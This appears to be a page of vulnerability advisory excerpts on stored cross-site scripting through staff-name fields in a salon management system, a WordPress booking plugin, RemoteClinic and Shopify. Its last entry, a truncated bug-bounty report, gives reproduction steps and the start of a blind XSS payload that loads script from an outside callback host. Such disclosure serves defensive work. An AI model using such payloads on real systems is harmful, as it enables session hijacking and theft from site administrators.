CVE-2025-7140

A vulnerability classified as problematic has been found in SourceCodester Best Salon Management System 1.0. Affected is an unknown function of the file /panel/edit-staff.php of the component Update Staff Page. The manipulation of the argument Staff Name leads to cross site scripting. It is...

PT-2025-28248 · Sourcecodester · Sourcecodester Best Pos Management System

Name of the Vulnerable Software and Affected Versions: SourceCodester Best Salon Management System version 1.0 Description: A problematic issue has been discovered, affecting an unknown function of the file /panel/edit-staff.php of the component Update Staff Page. The manipulation of the Staff Na...

SourceCodester Best Salon Management System 代码注入漏洞

SourceCodester Best Salon Management System is SourceCodester open source a salon management system. A code injection vulnerability exists in version 1.0 of the SourceCodester Best Salon Management System, which originates from an incorrect manipulation of the parameter Staff Name in the file...

CVE-2021-24930

The WordPress Online Booking and Scheduling Plugin WordPress plugin before 20.3.1 does not escape the Staff Full Name field before outputting it back in a page, which could lead to a Stored Cross-Site Scripting issue...

Saad Irfan RemoteClinic 跨站脚本漏洞

Remote Clinic is an open source clinic management system that allows you to remotely manage your clinic via the Web. A cross-site scripting vulnerability exists in Remote Clinic v2.0. The vulnerability can be exploited to inject arbitrary script or html via the First Name or Last Name field of...

Shopify: Blind Stored XSS Via Staff Name

Hey Team, I found blind stored XSS when i add staff name in https://your-store.myshopify.com/admin/settings/account Step to reproduce : 1. Go to https://your-store.myshopify.com/admin/settings/account 2. Add Staff Account 3. Fill First & Last Name with this payload "$.getScript"//█████████.xss.ht...